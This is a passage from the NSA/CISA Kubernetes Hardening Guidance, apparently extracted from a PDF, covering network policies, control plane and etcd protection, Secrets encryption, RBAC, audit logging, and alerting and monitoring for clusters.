Secrets) at rest. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 14 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nNetwork p olicies \nNetwork policies control traffic flow between Pods, namespaces, and external IP \naddresses. By default, no network policies are applied to P ods or namespaces , \nresulting in unrestrict ed ingress and egress traffic \nwithin the Pod network . Pods become isolated \nthrough a network policy that applies to the Pod or \nthe Pod\u2019s namespace. Once a Pod is select ed in a \nnetwork policy, it reject s any connections that are \nnot specifically allowed by any applicable policy \nobject. \nTo create network policies, a network plugin that \nsupports the NetworkPolicy API is required. Pods \nare selected using the podSelector and/or the \nnamespaceSelector options. An example \nnetwork policy is shown in Appendix E : Exam ple \nnetwork policy . Network policy formatting may \ndiffer depending on the container network interface \n(CNI) plugin used for the cluster. Administrators should use a default policy selecting all \nPods to deny all ingress and egress traffic and ensure any uns elected Pods are \nisolated. Additional policies could then relax these restrictions for permissible \nconnections. \nExternal IP addresses can be used in ingress and egress policies using ipBlock , but \ndifferent CNI plugins, cloud providers, or service implement ations may affect the order \nof NetworkPolicy processing and the rewriting of addresses within the cluster. \nResource policies \nIn addition to network policies, LimitRange and ResourceQuota are two policies that can \nlimit resource usage for namespaces or node s. A LimitRange policy constrains \nindividual resources per Pod or container within a particular namespace, e.g., by \nenforcing maximum compute and storage resources. Only one LimitRange constraint \ncan be created per namespace as shown in the example YAML file of Appendix F: \nExample LimitRange . Kubernetes 1.10 and newer supports LimitRange by default. \nUnlike LimitRange p olicies that apply to each Pod or container individually , \nResourceQuotas are restrictions placed on the aggregate resource usage for an entire Network Policies Checklist \n\uf0fc Use CNI plugin that supports \nNetworkPolicy API \n\uf0fc Create policies that select P ods using \npodSelector and/or the \nnamespaceSelector \n\uf0fc Use a default policy to deny all ingress \nand egress traffic . Ensure s unselected \nPods are isolated to all namespaces \nexcept kube -system \n\uf0fc Use LimitRange and ResourceQuota \npolicies to limit resources on a \nnamespace or Pod level \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 15 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nnamespace, such as limits placed on total CPU and memory usage. If a user tries to \ncreate a Pod that violate s a LimitRange or ResourceQuota policy, the Pod creation fail s. \nAn example ResourceQuota policy is shown in Appendix G: Example \nResourceQuota . \nControl plane hardening \nThe control plane is the core of Kubernetes and gives \nusers the ability to view containers, schedule new Pods, \nread Secrets , and execute commands in the cluster. \nBecause of these sensitive capabilities, the control \nplane should be highly protected. In addition to secure \nconfigurat ions such as TLS encryption, RBAC, and a \nstrong authentication method, network separation can \nhelp prevent unauthorized users from accessing the \ncontrol plane. The Kubernetes API server runs on ports \n6443 and 8080 , which should be protected by a firewall \nto accept only expected traffic. Port 8080, by default, is \nacce ssible without TLS encryption from the local \nmachine , and the request bypasses authentication and authorization modules. The \ninsecure port can be disabled using the API server flag --insecure -port=0 . The \nKubernetes API serve r should not be exposed to the Internet or an untrusted network. \nNetwork policies can be applied to the kube -system namespace to limit internet access \nto the kube -system. If a default deny policy is implemented to all namespa ces, the \nkube -system namespace must still be able to communicate with other control plane \nsegments and worker nodes. \nThe following table lists the control plane ports and services: \nTable II: Control plane ports \nProtocol Direction Port Range Purpose \nTCP Inbound 6443 or 8080 if not disabled Kubernetes API server \nTCP Inbound 2379 -2380 etcd server client API \nTCP Inbound 10250 kubelet API \nTCP Inbound 10251 kube -scheduler \nTCP Inbound 10252 kube -controller -manager \nTCP Inbound 10258 cloud -controller -manager (optional) Steps to secure the control plane \n1. Set up TLS encryption \n2. Set up strong authentication \nmethod s \n3. Disable access to internet and \nunnecessary, or untrusted networks \n4. Use RBAC policies to restrict \naccess \n5. Secure the etcd datastore with \nauthentication and RBAC policies \n6. Protect kubeconfig files from \nunauthorized modifications \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 16 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nEtcd \nThe etcd backend database stores state information and cluster Secrets . It is a critical \ncontrol plane component, and gaining write access to etcd could give a cyber actor root \naccess to the entire cluster. Etcd should only be accessed through the API server where \nthe cluster\u2019s authentication method and RBAC policies can res trict users. The etcd data \nstore can run on a separate control plane node allowing a firewall to limit access to only \nthe API servers. Administrators should set \nup TLS certificates to enforce HTTPS \ncommunication between the etcd server \nand API servers. The etcd server should be \nconfigured to only trust certificates \nassigned to API servers. \nKubeconfig Files \nThe kubeconfig files contain sensitive \ninformation about clusters, users, \nnamespaces, and authentication mechanisms. Kubectl uses the configuration file s \nstored in the $HOME/.kube directory on the worker node and control plane local \nmachines . Cyber actors can exploit access to this configuration directory to gain access \nto and modify configurations or credentials to further compromise the cluster. The \nconfiguration files should be protected from unintended changes, and unauthenticated \nnon-root users should be blocked from accessing the files. \nWorker node segmentation \nA worker node can be a virtual or physical machine, depending on the cluster\u2019s \nimplementat ion. Because nodes run the microservices and host the web applications for \nthe cluster, they are often the target of exploits. If a node becomes compromised, an \nadministrator should proactively limit the attack surface by separating the worker nodes \nfrom o ther network segments that do not need to communicate with the worker nodes or \nKubernetes services. A firewall can be used to separate internal network segments from \nthe external facing worker nodes or the entire Kubernetes service depending on the \nnetwork . Examples of services that may need to be separated from the possible attack \nsurface of the worker nodes are confidential databases or internal services that would \nnot need to be internet accessible. \nThe following table lists the worker node ports and se rvices: The etcd backend database \nis a critical control plane \ncomponent and the most \nimportant piece to secure \nwithin the cluster. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 17 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nTable III: Worker node ports \nProtocol Direction Port Range Purpose \nTCP Inbound 10250 kubelet API \nTCP Inbound 30000 -32767 NodePort Services \nEncryption \nAdministrators should configure all traffic in the Kubernetes cluster \u2014including between \ncomponents, nodes , and the control plane \u2014to use TLS 1.2 or 1.3 encryption. \nEncryption can be set up during installation or afterward using TLS bootstrapping , \ndetailed in the Kubernetes documentation , to cre ate and distribute certificates to nodes. \nFor all methods, certificates must be distributed amongst nodes to communicate \nsecurely. \nSecrets \nKubernetes Secrets maintain sensitive information, such as pa sswords, OAuth tokens, \nand SSH keys. Storing sensitive information in Secrets provides greater access control \nthan storing passwords or tokens in YAML files, container images, or environment \nvariables. By default, Kubernetes stores Secrets as unencrypted b ase64 -encoded \nstrings that can be retrieved by anyone with API access. Access can be restricted by \napplying RBAC policies to the secrets resource. \nSecrets can be encrypted by configuring data -at-rest encryption on the API server or by \nusing an external Key Management Service (KMS), which may be available through a \ncloud provider. To enable Secret data -at-rest encryption using the API server, \nadministrators should change the kube-apiserver manifest file to execute using the \n--encryption -provider -config argument. An example encryption -\nprovider -config file is shown in Appendix \nH: Example encryption . Using a KMS \nprovider prevent s the raw encryption key from \nbeing stored on the local disk. To encrypt \nSecrets with a KMS provider, the \nencrypti on-provider -config file should \nspecify the KMS provider as shown in \nAppendix I : Example KMS configuration . By default, Secrets are \nstored as unencrypted \nbase64 -encoded strings and \ncan be retrieved by anyone \nwith API access. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 18 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAfter applying the encryption -provider -config file, administrators should run the \nfollowing command to read and encrypt all Secrets: \nkubectl get se crets --all-namespaces -o json | kubectl replace -f - \nProtecting sensitive cloud infrastructure \nKubernetes is often deployed on virtual machines in a cloud environment. As such, \nadministrators should carefully consider the attack surface of the virtual mac hines on \nwhich the Kubernetes worker nodes are running. In many cases, Pods running on these \nvirtual machines have access to sensitive cloud metadata services on a non -routable \naddress. These metadata services provide cyber actors with information about th e cloud \ninfrastructure and possibly even short -lived credentials for cloud resources. Cyber \nactors abuse these metadata services for privilege escalation [5]. Kubernetes \nadministrators should prevent Pods from accessing cloud metadata services by using \nnetwork policies or through the cloud configuration policy. Because these services vary \nbased on the cloud provider, administrators should follow vendor guidance to harden \nthese access vectors. \n\u25b2Return to Contents \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 19 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAuthentication and a uthorization \nAuthentication and authorization are the primary mechanisms to restrict access to \ncluster resources. Cyber actors can scan for well -known Kubernetes ports and access \nthe cluster\u2019s database or make API calls without being authe nticated if the cluster is \nmisconfigured. User authentication is not a built -in feature of Kubernetes. However, \nseveral methods exist for administrators to add authentication to a cluster. \nAuthentication \nKubernetes clusters have two types of users : service accounts and normal user \naccounts. Service accounts handle API requests on behalf of Pods. Authentication is \ntypically managed automatically by Kubernetes through the ServiceAccount Admission \nController using bearer tokens. The bearer tokens are mounted i nto Pods at well -known \nlocations and can be used from outside the cluster if the tokens are left unsecured. \nBecause of this, access to Pod Secrets should be restricted to those with a need to view \nthem using Kubernetes RBAC. For normal users and admin acco unts, there is no \nautomatic authentication method for users . Administrators must add an authentication \nmethod to the cluster to implement authentication and authorization mechanisms. \nKubernetes assumes that a cluster -independent service manages user authentication. \nThe Kubernetes documentation lists several ways to implement user authentication \nincluding client certificates, bearer tokens, authentication plugins, and other \nauthentication protocols. At least one user authentication method should be \nimplemented. When multiple authentication methods are implemented, the first module \nto successfully authenticate the request \nshort -circuits the evaluation. Administrator s \nshould not use weak methods such as static \npassword files. Weak authentication \nmethods could allow cyber actors to \nauthenticate as leg itimate users. \nAnonymous requests are requests that are \nrejected by other configured authentication \nmethods and are not tied to any individual \nuser or Pod. In a server set up for token authentication with anonymous requests \nenabled, a request without a to ken present would be performed as an anonymous Administrators must add an \nauthentication method to \nthe cluster to implement \nauthentication and \nauthorization mechanisms. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 20 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nrequest. In Kubernetes 1.6 and newer, anonymous requests are enabled by default. \nWhen RBAC is enabled, anonymous requests require explicit authorization of the \nsystem:anonymous user or system:unauthenticated group. Anonymous \nrequests should be disabled by passing the --anonymous -auth=false option to the \nAPI server. Leaving anonymous requests enabled could allow a cyber actor to access \ncluster resources without authentication. \nRole -based access c ontrol \nRBAC is one method to control access to cluster resources based on the roles of \nindividuals within an organization. RBAC is enabled by default in Kubern etes version \n1.6 and newer. To check if RBAC is enabled in a cluster using kubectl, execute \nkubectl api -version . The API version for .rbac.authorization.k8s.io/v1 \nshould be listed if enabled. Cloud Kubernetes services may have a different way of \nchecking whether RBAC is enabled for the cluster. If RBAC is not enabled, start the API \nserver with the --authorization -mode flag in the following command: \nkube-apiserver --authorization -mode=RBAC \nLeaving authorization -mode flags , such as AlwaysAllow , in place allow s all \nauthorization requests, effectively disabling all authorization and limiting the ability to \nenforce least privilege for access. \nTwo types of permissions can be set : Roles and ClusterRoles. Roles set permissions \nfor particular namespaces, whereas ClusterRoles set permissions across all cluster \nresources regardless of namespace. Roles and ClusterRoles can only be used to add \npermissions. There are no deny rules. If a c luster is configured to use RBAC and \nanonymous access is disabled, the Kubernetes API server will deny permission s not \nexplicitly allowed. An example RBAC Role is shown in Appendix J : Example pod-\nreader RBAC Role . \nA Role or ClusterRole defines a permission but does not tie the permission to a user. \nRoleBindings and Cluster RoleBindings are used to tie a Role or ClusterRole to a user, \ngroup , or service account. RoleBindings grant permissions in Roles or ClusterRoles to \nusers, groups, or service accounts in a defined namespace. ClusterRole s are created \nindependent of namespaces and can then be granted to individuals using a RoleBinding \nto limi t the namespace scope. Cluster RoleBindings grant users, groups, or service \naccounts ClusterRoles across all cluster resources. An example RBAC RoleBinding and \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 21 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nClusterRoleBinding is shown in Appendix K : Example RBAC RoleBinding and \nClusterRoleBinding . \nTo cr eate or update Roles and ClusterRoles, a user must have the permissions \ncontained in the new role at the same scope or possess explicit permission to perform \nthe escalate verb on the Roles or ClusterRoles resources in the \nrbac.authorization.k8s.io API grou p. After a binding is created, the Role or \nClusterRole is immutable. The binding must be deleted to change a role. \nPrivileges assigned to users, groups, and service accounts should follow the principle of \nleast privilege, giving only required permissions t o resources. Users or user groups can \nbe limited to particular namespaces where required resources reside. By default, a \nservice account is created for each namespace for Pods to access the Kubernetes API. \nRBAC policies can be used to specify allowed actio ns from the service accounts in each \nnamespace. Access to the Kubernetes API is limited by creating an RBAC Role or \nClusterRole with the appropriate API request verb and desired resource on which the \naction can be applied. Tools exist that can help audit R BAC policies by printing users, \ngroups, and service account s with their associated assigned Roles and ClusterRoles . \n\u25b2Return to Contents \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 22 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nLog auditing \nLogs capture activity in the cluster. Auditing logs is necessary, not only for ensuring that \nservices are operating and conf igured as intended, but also for ensuring the security of \nthe system. Systematic audit requirements man date consistent and thorough checks of \nsecurity settings to help identify compromises. Kubernetes is capable of capturing audit \nlogs for cluster actions and monitoring basic CPU and memory usage information; \nhowever, it does not natively provide in -depth m onitoring or alerting services. \n \nLogging \nSystem administrators running applications within Kubernetes should establish an \neffective logging, monitoring, and alerting system for their environment. Logging \nKubernetes events alone is not enough to provide a full picture of the actions occurring \non the system. Logging should also be performed at the host level, application level, \nand on the cloud if applicable. These logs can then be correlated with any external \nauthentication and system logs as applicable to provide a full view of the actions taken \nthroughout the environment for use by security auditors and incident responders. \nWithin the Kubernetes environment, a dministrators should monitor/log the following: \n\uf0b7 API request history \n\uf0b7 Performance metrics \n\uf0b7 Deployment s \n\uf0b7 Resource consumption \n\uf0b7 Operating system calls \n\uf0b7 Protocols, permission changes \n\uf0b7 Network traffic Key points \n\uf05d Establish Pod baselines at creation to enable anomalous activity identification. \n\uf05d Perform logging at the host level, application level, and on the cloud if applicable. \n\uf05d Integrate existing network security tools for aggregate scans, monitoring, alert s, \nand analysis . \n\uf05d Set up local log storage to prevent loss in case of a communication failure. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 23 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n\uf0b7 Pod scaling \nWhen a Pod is created or updated, administrators should capture detailed logs of the \nnetwork communications, response times, requests, resource consumption, and any \nother relevant metrics to establish a baseline. As detailed in the previous section, \nanonymous accounts should be disabled, but logging policies should still record actions \ntaken by anonymous accounts to identify anomalous activity. \nRBAC policy configurations should be audited periodically and whenever changes occur \nto the organization\u2019s system administrators . Doing so ensure s access controls are \nadjusted in compliance with the RBAC policy -hardening guidance outlined in the r ole-\nbased a ccess control section. \nAudits should include comparisons of current logs to the baseline measurements of \nnormal activities to identify significant changes in any of the logged metrics and events. \nSystem administrators should investigate significant changes \u2014e.g., a change in \napplication usage or installation of malicious processes such as a cryptominer \u2014to \ndetermine the root cause. Audits of internal and external traffic logs should be \nconducted to ensure all intended security constraints on connections have been \nconfigured properly and are working as intended. \nAdministrators can also use these audits as \nsystems evolve to identify when exter nal access \nmay no longer be needed and can be restricted. \nLogs can be streamed to an external logging \nservice to ensure availability to security \nprofessionals outside of the cluster, identify \nabnormalities as close to real time as possible, \nand protect lo gs from being deleted if a \ncompromise occurs. If using this method, logs \nshould be encrypted during transit with TLS 1.2 or 1.3 to ensure cyber actors cannot \naccess the logs in transit and gain valuable information about the environment. Another \nprecaution to take when utilizing an external log server is to configure the log forwarder \nwithin Kubernetes with append -only access to the external storage. This helps protect \nthe externally stored logs from being deleted or overwritten from within the cluster. Kubernetes auditing \ncapabilities are \ndisabled by default, so \nif no audit policy has \nbeen written, nothing \nis logged. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 24 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nKubernetes native audit logging configuration \nThe kube-apiserver resides on the Kubernetes control plane and acts as the front \nend, handling internal and external requests for a cluster. Each request, whether \ngenerated by a user, an application, or the cont rol plane, produces an audit event at \neach stage in its execution. When an audit event registers, the kube-apiserver \ncheck s for an audit policy file and applicable rule. If such a rule exists, the server log s \nthe event at the level defined by the first matched rule. Kubernetes\u2019 built -in auditing \ncapabilities are not enabled by default, so if no audit policy has been written, nothing is \nlogged. \nCluster administrators must write an audit policy YAML file to est ablish the rules and \nspecify the desired audit level at which to log each type of audit event. This audit policy \nfile is then passed to the kube-apiserver with the appropriate flags. For a rule to be \nconsidered valid, it must specify one of the four audit levels: None , Metadata , \nRequest , or RequestResponse . Appendix L: Audit Policy shows the contents of an \naudit policy file that logs all events at the RequestResponse level. Appendix M: \nExample flags with which to submit Audit Policy file to kube -apiserver shows \nwhere the kube-apiserver configuration file is located and provides an example of \nthe flags by which the audit policy file can be passed to the kube-apiserver . \nAppendix M also provides directions for how to mount the volumes and configure the \nhost pat h if necessary. \nThe kube-apiserver includes configurable logging and webhook backends for audit \nlogging. The logging backend writes the audit events specified to a log file, and the \nwebhook backend can be configured to send the file to an external HTTP API . The --\naudit-log-path and --audit-log-maxage flags , set in the example in Appendix \nM, are two examples of the flags that can be used to configure the log backend, which \nwrites audit events to a file. The log-path flag is the minimum configuration required \nto enable logging and the only configuration necessary for the logging backend. The \ndefault format for these log files is JSON, though this can also be changed if necessary. \nAdditional configuration options for t he logging backend can be found in the Kubernetes \ndocumentation . \nTo push the audit logs to the organization\u2019s SIEM platform, a webhook backend can be \nmanually configured via a YAML file submitted to the kube-apiserver . An example \nwebhook config uration file and the flags needed to pass the file to the kube- \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 25 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \napiserver to attach the webhook backend are located in Appendix N: Webhook \nconfiguration . An exhaustive list of the config uration options, which can be set in the \nkube-apiserver for the webhook backend, can be found in the Kubernetes \ndocumentation . \nWorker node and container loggi ng \nThere are many ways for logging capabilities to be configured within a Kubernetes \narchitecture. In the built -in method of log management, the kubelet on each node is \nresponsible for managing logs. It stores and rotates log files locally based on its pol icies \nfor individual file length, storage duration, and storage capacity. These logs are \ncontrolled by the kubelet and can be accessed from the command line. The following \ncommand print s the logs of a container within a Pod: \nkubectl logs [ -f] [-p] POD [ -c CONTAINER] \nThe -f flag may be used if the logs are to be streamed, the -p flag may be used if logs \nfrom previous instances of a container exist and are desired, and the -c flag can be \nused to specify a container if there are more than one in the Pod. If an error occurs that \ncauses a container, Pod, or node to die, the native logging solution in Kubernetes does \nnot provide a method to preserve logs stored in the failed object. NSA and CISA \nrecommend configuring a remote logging solution to preserve logs should a node fail. \nOptions for remote logging include: \nRemote logging option Reason to use Configuration implementation \nRunning a logging agent on \nevery node to push logs to \na backend Gives the node the ability to \nexpose logs or push logs to a \nbackend, preserving them outside \nof the node in the case of a \nfailure . Configure an independent container \nin a Pod to run as a logging agent, \ngiving it access to the node\u2019s \napplication log files and configuring \nit to forwar d logs to the \norganization\u2019s SIEM . \nUsing a sidecar container in \neach Pod to push logs to \nan output stream Used to push logs to separate \noutput streams. This can be a \nuseful option when application \ncontainers write multiple log files \nof different formats. Configure sidecar container for \neach log type and use to redirect \nthese log files to their individual \noutput streams, where they can be \nhandled by the kubelet . The \nnode -level logging agent can then \nforward these logs onto the SIEM or \nother backend . \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 26 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nUsing a logging agent \nsidecar in each Pod to push \nlogs to a backend When more flexibility is needed \nthan the node -level logging agent \ncan provide . Configure for each Pod to push logs \ndirectly to the backend. This is a \ncommon method for attaching third -\nparty logg ing agents and backends. \nPushing logs directly to a \nbackend from within an \napplication Capture application logs. \nKubernetes does not have built -in \nmechanisms for exposing or \npushing logs to a backend \ndirectly . Organizations will need to either \nbuild this functionality into their \napplication or attach a reputable \nthird-party tool to enable this. \nA sidecar container is run in a Pod with other containers and can be configured to \nstream logs to a log file or logging backend. A sidecar container can also be co nfigured \nto act as a traffic proxy for another standard functionality container with which it is \npackaged and deployed. \nIn order to ensure continuity of these logging agents across worker nodes , it is common \nto run them as a DaemonSet. Configuring a Daemo nSet for this method ensures that \nthere is a copy of the logging agent on every node at all times and that any changes \nmade to the logging agent are consistent across the cluster. \nSeccomp: audit m ode \nIn addition to the node and container logging described above, it can be highly \nbeneficial to log system calls. One method for auditing container system calls in \nKubernetes is to use the Secure Compute Mode (seccomp) tool. This tool is disabled by \ndefault but can be used to limit a container\u2019s system call abili ties, thereby lowering the \nkernel\u2019s attack surface. Seccomp can also log what calls are being made by using an \naudit profile. \nA custom seccomp profile is used to define which system calls are allowed and default \nactions for calls not specified. To enable a custom seccomp profile within a Pod, \nKubernetes admins can write their seccomp profile JSON file to the \n/var/lib/kubelet/secc omp/ directory and add a seccompProfile to the Pod\u2019s \nsecurityContext . A custom seccompProfile should also include two fields: \nType: Localhost and localhostProfile: myseccomppolicy.json . Logging \nall system calls can help administrators know what system call s are needed for \nstandard operations allowing them to restrict the seccomp profile further without losing \nsystem functionality. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 27 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nSYSLOG \nKubernetes , by default , writes kubelet logs and container runtime logs to journald if \nthe service is available. If organizations wish to utilize syslog utilities for systems that do \nnot use them by default \u2014or to collect logs from across the cluster and forward them to \na syslog server or other log storage and aggregation platform \u2014they can configure that \ncapability manually. Syslog protocol defines a log message -formatting standard. Syslog \nmessages include a header \u2014consisting of a timestamp, hostname, application name, \nand process ID (PID) \u2014and a message written in plaintext. Syslog services such as \nsyslog -ng\u00ae and rsyslog are capable of collecting and aggregating logs from across a \nsystem in a unified format. Many Linux operating systems by default use rsyslog or \njournald \u2014an event logging daemon, w hich optimizes log storage and output logs in \nsyslog format via journalctl. The syslog utility, on nodes running certain Linux \ndistributions logs events , by default, at the operating system level. Containers running \nthese Linux distributions will , by defau lt, collect logs using syslog as well. The logs that \nare collected by syslog utilities are stored in the local file system on each applicable \nnode or container unless a log aggregation platform is configured to collect them. \nSIEM platforms \nSecurity Inform ation and Event Management (SIEM) software collects logs from across \nan organization\u2019s network . SIEM software bring s together firewall logs, application logs, \nand more ; parsing them out to provide a centralized platform from which analysts can \nmonitor syst em security. SIEM tools have variations in their capabilities. Generally, \nthese platforms provide log collection, threat detection, and alerting capabilities. Some \ninclude machine learning capabilities, which can better predict system behavior and \nhelp to reduce false alerts. Organizations using these platforms in their environment can \nintegrate them with Kubernetes to better monitor and secure clusters. Open source \nplatforms for managing logs from a Kubernetes environment exist as an alternative to \nSIEM platforms. \nContainerized environments have many interdependencies between nodes, Pods, \ncontainers, and services. In these environments, Pods and containers are constantly \nbeing taken down and restarted on different nodes. This presents a n extra challenge f or \ntraditional SIEMs , which typically use IP addresses to correlate logs. Even next-gen \nSIEM platforms may not always be suited to the complex Kubernetes environment. \nHowever, as Kubernetes has emerged as the most widely used container orchestration \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 28 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nplatfo rm, many of the organizations developing SIEM tools have developed variations of \ntheir products specifically designed to work with the Kubernetes environment , providing \nfull monitoring solutions for these containerized environments. Administrators should b e \naware of their platform\u2019s capabilities and ensure that their logging sufficiently captures \nthe environment to support future incident responses. \nAlerting \nKubernetes does not natively support alerting; however, several monitoring tools with \nalerting capa bilities are compatible with Kubernetes. If Kubernetes administrators \nchoose to configure an alerting tool to work within a Kubernetes environment , there are \nseveral metrics for which administrators should monitor and configure alerts. \nExamples of cases t hat could trigger alerts include but are not limited to: \n\uf0b7 low disk space on any of the machines in the environment , \n\uf0b7 available storage space on a logging volume running low , \n\uf0b7 external logging service going offline , \n\uf0b7 a Pod or application running with root permi ssions , \n\uf0b7 requests being made by an account for resources they do not have permission \nfor, \n\uf0b7 an anonymous account being used or gaining privileges , \n\uf0b7 Pod or Worker Node IP addresses being listed as the source ID of a Pod creation \nrequest , \n\uf0b7 unusual system calls or failed API calls , \n\uf0b7 user/admin behavior that is abnormal ( i.e. at unusual times or from an unusual \nlocation) , and \n\uf0b7 significant deviations from the standard operation metrics baseline . \nAlerting when storage is low can help avoid performance issues and log los s due to \nlimited resources and help identify malicious cryptojacking attempts. Cases of privileged \nPod execution can be investigated to determine if an administrator made a mistake, an \nauthentic use case necessitat es escalated privileges, or a malicious actor deployed a \nprivileged Pod . Suspicious Pod creation source IP addresses could indicate that a \nmalicious cyber actor has broken out of a container and is attempting to create a \nmalicious Pod. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 29 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nIntegrating Kubernete s with an organization\u2019s existing SIEM platform, especially those \nwith machine learning/big data capabilities, can be useful in identifying irregularities in \naudit logs and cutting down on false alerts. If configuring such a tool to work with \nKubernetes, i t should be configured so that these cases and any others applicable to \nthe use case are configured to trigger alerts. \nSystems capable of acting automatically when suspected intrusions occur could \npotentially be configured to take steps to mitigate comprom ises while administrators \nrespond to alerts. In the case of a Pod IP being listed as the source ID of a Pod creation \nrequest, one mitigation that could be implemented to keep the application available but \ntemporarily stop any compromises of the cluster wou ld be to automatically evict the \nPod. Doing so would allow a clean version of the Pod to be rescheduled onto one of the \nnodes. Investigators can then examine the logs to determine if a breach occurred and, if \nso, how the malicious actors executed the compr omise so that a patch can be \ndeployed. \nService meshes \nService meshes are platforms that streamline microservice communications within an \napplication by allowing for the logic of these communications to be coded into the \nservice mesh rather than within eac h microservice. Coding this communication logic into \nindividual microservices is difficult to scale, difficult to debug as failures occur, and \ndifficult to secure. Using a service mesh can simplify this for developers. The mesh can : \n\uf0b7 redirect traffic when a service is down , \n\uf0b7 gather performance metrics for optimizing communications , \n\uf0b7 allow management of service -to-service communication encryption , \n\uf0b7 collect logs for service -to-service communication , \n\uf0b7 collect logs from each service , and \n\uf0b7 help developers diagnose problems and failures of microservic es or \ncommunication mechanisms . \nService meshes can also help with migrating services to hybrid or multi -cloud \nenvironments. While service meshes are not necessary, they are an option that is highly \nsuitable to the Kubern etes environment. Managed Kubernetes services often include \ntheir own service mesh. However, several other platforms are also available and , if \ndesired, are highly customizable. Some of these include a Certificate Authority that \ngenerates and rotates certi ficates, allowing for secure TLS authentication between \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 30 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nservices. Administrators should consider using service meshes to harden Kubernetes \ncluster security. \n \nFigure 5: Cluster leveraging service mesh to integrate logging with net work security \nFault tolerance \nFault tolerance policies should be put in place to ensure logging service availability. \nThese policies could differ depending on the specific Kubernetes use case. One policy \nthat can be put in place is to allow new logs to overwrite the oldest log files if absolutely \nnecessary in the event of storage capacity being exceeded. \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 31 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nIf logs are being sent to an external service, a mechanism should be in place for logs to \nbe stored locally if a communication loss or external service failure occurs. Once \ncommunicati on to the external service is restored, a policy should be in place for the \nlocally stored logs to be pushed up to the external server. \nTools \nKubernetes does not include extensive auditing capabilities. However, the system is \nbuilt to be extensible, allow ing users the freedom to develop their own custom solution \nor to choose an existing add -on that suits their needs. One of the most common \nsolutions is to add additional audit backend services, which can use the information \nlogged by Kubernetes and perform additional functions for users , such as extended \nsearch parameters, data mapping features, and alerting functionality. Organizations that \nalready use SIEM platforms can integrate Kubernetes with these existing capabilities. \nOpen -source monitoring tools \u2014such as the Cloud Native Computing Foundation\u2019s \nPrometheus\u00ae, Grafana Labs\u2019 Grafana\u00ae, and Elasticsearch\u2019s Elastic Stack (ELK)\u00ae\u2014are \navailable to conduct event monitoring, run threat analytics, manage alerting, and collect \nresource isolation parameters, historic al usage, and network statistics on running \ncontainers. Scanning tools can be useful when auditing the access control and \npermission configurations by assisting in identifying risky permission configurations in \nRBAC. NSA and CISA encourage organizations ut ilizing Intrusion D etection Systems \n(IDSs) on their existing environment to consider integrating that service into their \nKubernetes environment as well . This integration would allow an organization to monitor \nfor\u2014and potentially kill containers showing sig ns of\u2014unusual behavior so the \ncontainers can be restarted from the initial clean image. Many c loud service providers \nalso provide container monitoring services for those wanting more managed and \nscalable solutions. \n\u25b2Return to C ontents \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 32 \nNational \nSecurity 